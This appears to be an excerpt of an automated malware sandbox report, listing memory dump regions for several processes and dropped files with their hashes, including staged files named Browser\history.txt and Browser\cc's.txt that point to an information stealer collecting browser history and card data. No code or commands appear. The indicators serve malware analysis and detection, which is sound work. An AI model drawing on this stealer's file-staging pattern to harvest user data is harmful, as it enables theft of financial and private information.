memory/4984-241-0x00007FFB15C70000-0x00007FFB15C7C000-memory.dmp

memory/4984-240-0x00007FFB15FA0000-0x00007FFB15FAB000-memory.dmp

memory/4984-239-0x00007FFB15FB0000-0x00007FFB15FBC000-memory.dmp

memory/4984-238-0x00007FFB1A0B0000-0x00007FFB1A0BB000-memory.dmp

memory/4984-237-0x00007FFB1FB40000-0x00007FFB1FB4C000-memory.dmp

memory/4984-236-0x00007FFB1FCA0000-0x00007FFB1FCAB000-memory.dmp

memory/4984-235-0x00007FFB24040000-0x00007FFB2404B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI46882\charset_normalizer\md.cp312-win_amd64.pyd

MD5 21898e2e770cb9b71dc5973dd0d0ede0
SHA1 99de75d743f6e658a1bec52419230690b3e84677
SHA256 edd490bec8ec903cdbf62f39e0675181e50b7f1df4dc48a3e650e18d19804138
SHA512 dc8636d817ae1199200c24ac22def5d12642db951b87f4826015fd1d5c428d45410ce3b7f5bb5aaaa05deecf91d954b948f537bd6fa52a53364ab3609caac81d

memory/4500-215-0x00000138EC4A0000-0x00000138EC4C2000-memory.dmp

memory/4984-214-0x00007FFB20DB0000-0x00007FFB20DC4000-memory.dmp

memory/4984-213-0x00007FFB20DD0000-0x00007FFB20DE8000-memory.dmp

memory/4984-212-0x00007FFB20DF0000-0x00007FFB20E14000-memory.dmp

memory/4984-206-0x00007FFB260D0000-0x00007FFB26105000-memory.dmp

memory/4984-205-0x00007FFB15580000-0x00007FFB15C59000-memory.dmp

memory/4984-253-0x00007FFB0F8B0000-0x00007FFB0FB33000-memory.dmp

memory/4984-252-0x00007FFB11BE0000-0x00007FFB11BEC000-memory.dmp

memory/4984-251-0x00007FFB11DA0000-0x00007FFB11DB2000-memory.dmp

memory/4984-255-0x00007FFB11AA0000-0x00007FFB11ACE000-memory.dmp

memory/4984-254-0x00007FFB11BA0000-0x00007FFB11BC9000-memory.dmp

memory/4984-250-0x00007FFB2B7A0000-0x00007FFB2B7AD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\0NfxoOQrtB\Browser\history.txt

MD5 5638715e9aaa8d3f45999ec395e18e77
SHA1 4e3dc4a1123edddf06d92575a033b42a662fe4ad
SHA256 4db7f6559c454d34d9c2d557524603c3f52649c2d69b26b6e8384a3d179aeae6
SHA512 78c96efab1d941e34d3137eae32cef041e2db5b0ebbf883e6a2effa79a323f66e00cfb7c45eb3398b3cbd0469a2be513c3ff63e5622261857eefc1685f77f76b

C:\Users\Admin\AppData\Local\Temp\0NfxoOQrtB\Browser\cc's.txt

MD5 5aa796b6950a92a226cc5c98ed1c47e8
SHA1 6706a4082fc2c141272122f1ca424a446506c44d
SHA256 c4c83da3a904a4e7114f9bd46790db502cdd04800e684accb991cd1a08ee151c
SHA512 976f403257671e8f652bf988f4047202e1a0fd368fdb2bab2e79ece1c20c7eb775c4b3a8853c223d4f750f4192cd09455ff024918276dc1dd1442fa3b36623ad

memory/2072-361-0x000000001B180000-0x000000001B190000-memory.dmp

memory/4984-360-0x00007FFB15050000-0x00007FFB15579000-memory.dmp

memory/4984-359-0x00007FFB2A730000-0x00007FFB2A763000-memory.dmp

memory/4984-362-0x00007FFB16300000-0x00007FFB163CD000-memory.dmp

memory/4984-363-0x000001BFB6A90000-0x000001BFB6FB9000-memory.dmp

memory/4984-380-0x00007FFB14ED0000-0x00007FFB15046000-memory.dmp

memory/4984-381-0x00007FFB20DD0000-0x00007FFB20DE8000-memory.dmp

memory/4984-364-0x00007FFB15580000-0x00007FFB15C59000-memory.dmp

memory/4984-365-0x00007FFB2AAC0000-0x00007FFB2AAE5000-memory.dmp

memory/4984-420-0x00007FFB24040000-0x00007FFB2404B000-memory.dmp

memory/4984-445-0x00007FFB2A660000-0x00007FFB2A672000-memory.dmp

memory/4984-446-0x00007FFB15050000-0x00007FFB15579000-memory.dmp

memory/4984-444-0x00007FFB2A710000-0x00007FFB2A726000-memory.dmp

memory/4984-443-0x00007FFB260D0000-0x00007FFB26105000-memory.dmp

memory/4984-442-0x00007FFB16300000-0x00007FFB163CD000-memory.dmp

memory/4984-441-0x00007FFB2A730000-0x00007FFB2A763000-memory.dmp

memory/4984-440-0x00007FFB2B470000-0x00007FFB2B47D000-memory.dmp

memory/4984-439-0x00007FFB2AAB0000-0x00007FFB2AABD000-memory.dmp

memory/4984-438-0x00007FFB2B430000-0x00007FFB2B449000-memory.dmp

memory/4984-437-0x00007FFB2B7A0000-0x00007FFB2B7AD000-memory.dmp

memory/4984-436-0x00007FFB20DB0000-0x00007FFB20DC4000-memory.dmp

memory/4984-435-0x00007FFB2A770000-0x00007FFB2A79D000-memory.dmp

memory/4984-434-0x00007FFB2E240000-0x00007FFB2E24F000-memory.dmp

memory/4984-433-0x00007FFB2AAC0000-0x00007FFB2AAE5000-memory.dmp

memory/4984-432-0x00007FFB20DD0000-0x00007FFB20DE8000-memory.dmp

memory/4984-431-0x00007FFB2B7C0000-0x00007FFB2B7D9000-memory.dmp

memory/4984-428-0x00007FFB12AB0000-0x00007FFB12ABE000-memory.dmp

memory/4984-427-0x00007FFB15C60000-0x00007FFB15C6C000-memory.dmp

memory/4984-426-0x00007FFB15C70000-0x00007FFB15C7C000-memory.dmp

memory/4984-425-0x00007FFB15FA0000-0x00007FFB15FAB000-memory.dmp

memory/4984-424-0x00007FFB15FB0000-0x00007FFB15FBC000-memory.dmp

memory/4984-423-0x00007FFB1A0B0000-0x00007FFB1A0BB000-memory.dmp

memory/4984-422-0x00007FFB1FB40000-0x00007FFB1FB4C000-memory.dmp

memory/4984-421-0x00007FFB1FCA0000-0x00007FFB1FCAB000-memory.dmp

memory/4984-419-0x00007FFB12700000-0x00007FFB1281B000-memory.dmp

memory/4984-418-0x00007FFB1A0C0000-0x00007FFB1A0E7000-memory.dmp

memory/4984-414-0x00007FFB14ED0000-0x00007FFB15046000-memory.dmp

memory/4984-413-0x00007FFB20DF0000-0x00007FFB20E14000-memory.dmp

memory/4984-417-0x00007FFB2AAA0000-0x00007FFB2AAAB000-memory.dmp

memory/4984-398-0x00007FFB15580000-0x00007FFB15C59000-memory.dmp

memory/4984-457-0x00007FFB11AA0000-0x00007FFB11ACE000-memory.dmp

memory/4984-456-0x00007FFB11BA0000-0x00007FFB11BC9000-memory.dmp

memory/4984-455-0x00007FFB0F8B0000-0x00007FFB0FB33000-memory.dmp

memory/4984-454-0x00007FFB11BE0000-0x00007FFB11BEC000-memory.dmp

memory/4984-453-0x00007FFB11DA0000-0x00007FFB11DB2000-memory.dmp

memory/4984-452-0x00007FFB11DC0000-0x00007FFB11DCD000-memory.dmp

memory/4984-451-0x00007FFB11DD0000-0x00007FFB11DDC000-memory.dmp

memory/4984-450-0x00007FFB126E0000-0x00007FFB126EC000-memory.dmp

memory/4984-449-0x00007FFB126F0000-0x00007FFB126FB000-memory.dmp

memory/4984-448-0x00007FFB12A90000-0x00007FFB12A9B000-memory.dmp

memory/4984-447-0x00007FFB12AA0000-0x00007FFB12AAC000-memory.dmp

memory/2072-496-0x000000001B180000-0x000000001B190000-memory.dmp